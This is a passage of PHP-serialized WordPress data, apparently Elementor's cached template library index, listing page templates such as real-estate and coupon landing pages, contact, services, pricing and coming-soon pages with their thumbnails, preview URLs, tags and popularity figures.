2\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp3-l.png\";s:12:\"tmpl_created\";s:10:\"1490707422\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"79\";s:16:\"popularity_index\";s:2:\"33\";s:11:\"trend_index\";s:2:\"56\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:366;a:14:{s:2:\"id\";s:4:\"1415\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 3\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-1.png\";s:12:\"tmpl_created\";s:10:\"1494352106\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"80\";s:16:\"popularity_index\";s:3:\"262\";s:11:\"trend_index\";s:3:\"350\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:367;a:14:{s:2:\"id\";s:4:\"1414\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 4\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-2.png\";s:12:\"tmpl_created\";s:10:\"1494352107\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"81\";s:16:\"popularity_index\";s:3:\"368\";s:11:\"trend_index\";s:3:\"424\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:368;a:14:{s:2:\"id\";s:4:\"1413\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 5\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-3.png\";s:12:\"tmpl_created\";s:10:\"1494352109\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:134:\"[\"Agent\",\"business\",\"clean\",\"corporate\",\"flat\",\"google maps\",\"homes\",\"listing\",\"modern\",\"real estate\",\"realestate\",\"realtor\",\"realty\"]\";s:10:\"menu_order\";s:2:\"82\";s:16:\"popularity_index\";s:3:\"339\";s:11:\"trend_index\";s:3:\"333\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:369;a:14:{s:2:\"id\";s:4:\"1573\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-02.png\";s:12:\"tmpl_created\";s:10:\"1494352133\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"83\";s:16:\"popularity_index\";s:3:\"364\";s:11:\"trend_index\";s:3:\"352\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:370;a:14:{s:2:\"id\";s:4:\"1572\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-03.png\";s:12:\"tmpl_created\";s:10:\"1494352134\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"84\";s:16:\"popularity_index\";s:3:\"388\";s:11:\"trend_index\";s:3:\"372\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:371;a:14:{s:2:\"id\";s:4:\"1570\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 3\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-01.png\";s:12:\"tmpl_created\";s:10:\"1494352136\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"85\";s:16:\"popularity_index\";s:3:\"413\";s:11:\"trend_index\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:372;a:14:{s:2:\"id\";s:4:\"1571\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 4\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-04.png\";s:12:\"tmpl_created\";s:10:\"1494352138\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"86\";s:16:\"popularity_index\";s:3:\"389\";s:11:\"trend_index\";s:3:\"396\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:373;a:14:{s:2:\"id\";s:3:\"192\";s:5:\"title\";s:28:\"Landing Page &#8211; Webinar\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0015.png\";s:12:\"tmpl_created\";s:10:\"1470820734\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-webinar/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"87\";s:16:\"popularity_index\";s:2:\"49\";s:11:\"trend_index\";s:3:\"104\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:374;a:14:{s:2:\"id\";s:4:\"2141\";s:5:\"title\";s:32:\"Contact &#8211; Delivery Company\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-contact.png\";s:12:\"tmpl_created\";s:10:\"1499774122\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/contact-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"88\";s:16:\"popularity_index\";s:3:\"209\";s:11:\"trend_index\";s:3:\"257\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:375;a:14:{s:2:\"id\";s:3:\"137\";s:5:\"title\";s:22:\"Contact &#8211; Modern\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0013.png\";s:12:\"tmpl_created\";s:10:\"1470829828\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/contact-modern/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"89\";s:16:\"popularity_index\";s:2:\"28\";s:11:\"trend_index\";s:2:\"52\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:376;a:14:{s:2:\"id\";s:3:\"256\";s:5:\"title\";s:26:\"Contact &#8211; Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0011.png\";s:12:\"tmpl_created\";s:10:\"1470829796\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/contact-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"90\";s:16:\"popularity_index\";s:2:\"67\";s:11:\"trend_index\";s:3:\"155\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:377;a:14:{s:2:\"id\";s:4:\"2150\";s:5:\"title\";s:25:\"Contact &#8211; Cake Shop\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-contact.png\";s:12:\"tmpl_created\";s:10:\"1499774127\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/contact-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"91\";s:16:\"popularity_index\";s:2:\"42\";s:11:\"trend_index\";s:2:\"43\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:378;a:14:{s:2:\"id\";s:3:\"223\";s:5:\"title\";s:21:\"Contact &#8211; Hotel\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0002.png\";s:12:\"tmpl_created\";s:10:\"1470820471\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/contact-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"92\";s:16:\"popularity_index\";s:2:\"63\";s:11:\"trend_index\";s:3:\"134\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:379;a:14:{s:2:\"id\";s:2:\"24\";s:5:\"title\";s:25:\"Contact &#8211; Corporate\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0012.png\";s:12:\"tmpl_created\";s:10:\"1470248619\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/contact-corporate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"93\";s:16:\"popularity_index\";s:2:\"11\";s:11:\"trend_index\";s:2:\"11\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:380;a:14:{s:2:\"id\";s:3:\"184\";s:5:\"title\";s:23:\"Services &#8211; Moving\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0017.png\";s:12:\"tmpl_created\";s:10:\"1470829889\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/services-moving/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"94\";s:16:\"popularity_index\";s:2:\"19\";s:11:\"trend_index\";s:2:\"18\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:381;a:14:{s:2:\"id\";s:3:\"625\";s:5:\"title\";s:31:\"Services &#8211; Cake Shop Menu\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2016/12/cake-shop-menu.jpg\";s:12:\"tmpl_created\";s:10:\"1481549196\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/services-cake-shop-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"95\";s:16:\"popularity_index\";s:3:\"372\";s:11:\"trend_index\";s:3:\"433\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:382;a:14:{s:2:\"id\";s:3:\"187\";s:5:\"title\";s:20:\"Services &#8211; Fun\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0001.png\";s:12:\"tmpl_created\";s:10:\"1470829892\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/services-fun/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"96\";s:16:\"popularity_index\";s:2:\"32\";s:11:\"trend_index\";s:2:\"88\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:383;a:14:{s:2:\"id\";s:3:\"238\";s:5:\"title\";s:27:\"Services &#8211; Consulting\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0014.png\";s:12:\"tmpl_created\";s:10:\"1470829865\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/services-consulting/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"97\";s:16:\"popularity_index\";s:2:\"17\";s:11:\"trend_index\";s:2:\"25\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:384;a:14:{s:2:\"id\";s:3:\"647\";s:5:\"title\";s:33:\"Services &#8211; Coffee Shop Menu\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2016/12/restaurant-menu.jpg\";s:12:\"tmpl_created\";s:10:\"1481549320\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-coffee-shop-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"98\";s:16:\"popularity_index\";s:3:\"333\";s:11:\"trend_index\";s:3:\"413\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:385;a:14:{s:2:\"id\";s:4:\"2138\";s:5:\"title\";s:33:\"Services &#8211; Delivery Company\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-services.png\";s:12:\"tmpl_created\";s:10:\"1499774119\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"99\";s:16:\"popularity_index\";s:3:\"299\";s:11:\"trend_index\";s:3:\"376\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:386;a:14:{s:2:\"id\";s:3:\"823\";s:5:\"title\";s:19:\"Pricing &#8211; App\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-app.jpg\";s:12:\"tmpl_created\";s:10:\"1485272966\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/pricing-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"100\";s:16:\"popularity_index\";s:3:\"247\";s:11:\"trend_index\";s:3:\"402\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:387;a:14:{s:2:\"id\";s:3:\"824\";s:5:\"title\";s:24:\"Pricing &#8211; Software\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-software.png\";s:12:\"tmpl_created\";s:10:\"1485272900\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/pricing-software-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"101\";s:16:\"popularity_index\";s:3:\"274\";s:11:\"trend_index\";s:3:\"340\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:388;a:14:{s:2:\"id\";s:3:\"825\";s:5:\"title\";s:24:\"Product &#8211; Speakers\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/01/product-page.jpg\";s:12:\"tmpl_created\";s:10:\"1485272513\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/product-speakers/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"102\";s:16:\"popularity_index\";s:3:\"298\";s:11:\"trend_index\";s:3:\"392\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:389;a:14:{s:2:\"id\";s:3:\"245\";s:5:\"title\";s:21:\"Product &#8211; Clean\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0020.png\";s:12:\"tmpl_created\";s:10:\"1470829876\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/product-clean/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"fast\",\"minimal\",\"minimalistic\",\"seo\",\"simple\"]\";s:10:\"menu_order\";s:3:\"103\";s:16:\"popularity_index\";s:2:\"43\";s:11:\"trend_index\";s:3:\"152\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:390;a:14:{s:2:\"id\";s:3:\"150\";s:5:\"title\";s:19:\"Product &#8211; App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0003.png\";s:12:\"tmpl_created\";s:10:\"1470829879\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/product-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"104\";s:16:\"popularity_index\";s:2:\"22\";s:11:\"trend_index\";s:2:\"57\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:391;a:14:{s:2:\"id\";s:3:\"751\";s:5:\"title\";s:25:\"Homepage &#8211; Interior\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/01/interior-home.png\";s:12:\"tmpl_created\";s:10:\"1485269743\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"105\";s:16:\"popularity_index\";s:3:\"208\";s:11:\"trend_index\";s:3:\"347\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:392;a:14:{s:2:\"id\";s:3:\"753\";s:5:\"title\";s:22:\"About &#8211; Interior\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/01/Interior-About.png\";s:12:\"tmpl_created\";s:10:\"1485269710\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/about-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"106\";s:16:\"popularity_index\";s:3:\"266\";s:11:\"trend_index\";s:3:\"384\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:393;a:14:{s:2:\"id\";s:3:\"754\";s:5:\"title\";s:25:\"Services &#8211; Interior\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/01/Interior-Services.png\";s:12:\"tmpl_created\";s:10:\"1485269691\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/services-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"107\";s:16:\"popularity_index\";s:3:\"289\";s:11:\"trend_index\";s:3:\"320\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:394;a:14:{s:2:\"id\";s:3:\"752\";s:5:\"title\";s:24:\"Contact &#8211; Interior\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/interior-contact.png\";s:12:\"tmpl_created\";s:10:\"1485269737\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/contact-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"108\";s:16:\"popularity_index\";s:3:\"265\";s:11:\"trend_index\";s:3:\"271\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:395;a:14:{s:2:\"id\";s:4:\"1075\";s:5:\"title\";s:19:\"Shop &#8211; Sweets\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2017/03/Sweets.png\";s:12:\"tmpl_created\";s:10:\"1488810871\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/shop-sweets/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:154:\"[\"bakery\",\"beverage\",\"business\",\"cafe\",\"candy bar\",\"catering\",\"delivery service\",\"Food\",\"online shop\",\"pastry\",\"Restaurant\",\"store\",\"sweet shop\",\"sweets\"]\";s:10:\"menu_order\";s:3:\"109\";s:16:\"popularity_index\";s:2:\"34\";s:11:\"trend_index\";s:2:\"49\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:396;a:14:{s:2:\"id\";s:4:\"1051\";s:5:\"title\";s:24:\"Blog Post &#8211; Launch\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/post-cloud.png\";s:12:\"tmpl_created\";s:10:\"1488810869\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blog-post-launch/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:210:\"[\"Agency\",\"bootstrap\",\"business\",\"corporate\",\"Landing Page\",\"launch\",\"marketing campaign\",\"marketing landing page\",\"marketing template landing page\",\"product launch\",\"software\",\"Startup\",\"startup landing page\"]\";s:10:\"menu_order\";s:3:\"110\";s:16:\"popularity_index\";s:2:\"18\";s:11:\"trend_index\";s:2:\"17\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:397;a:14:{s:2:\"id\";s:4:\"1245\";s:5:\"title\";s:13:\"Coming Soon 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-1.png\";s:12:\"tmpl_created\";s:10:\"1491207184\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"111\";s:16:\"popularity_index\";s:3:\"189\";s:11:\"trend_index\";s:3:\"266\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:398;a:14:{s:2:\"id\";s:4:\"1247\";s:5:\"title\";s:13:\"Coming Soon 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-2.png\";s:12:\"tmpl_created\";s:10:\"1491207138\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"112\";s:16:\"popularity_index\";s:2:\"27\";s:11:\"trend_index\";s:2:\"33\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:399;a:14:{s:2:\"id\";s:4:\"1248\";s:5:\"title\";s:13:\"Coming Soon 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-3.png\";s:12:\"tmpl_created\";s:10:\"1491207050\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"113\";s:16:\"popularity_index\";s:3:\"304\";s:11:\"trend_index\";s:3:\"398\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:400;a:14:{s:2:\"id\";s:4:\"1249\";s:5:\"title\";s:13:\"Coming Soon 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-4.png\";s:12:\"tmpl_created\";s:10:\"1491207380\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"114\";s:16:\"popularity_index\";s:3:\"353\";s:11:\"trend_index\";s:3:\"377\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:401;a:14:{s:2:\"id\";s:4:\"1250\";s:5:\"title\";s:13:\"Coming Soon 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-5.png\";s:12:\"tmpl_created\";s:10:\"1491207450\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"115\";s:16:\"popularity_index\";s:2:\"38\";s:11:\"trend_index\";s:2:\"55\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:402;a:14:{s:2:\"id\";s:4:\"1260\";s:5:\"title\";s:13:\"Coming Soon 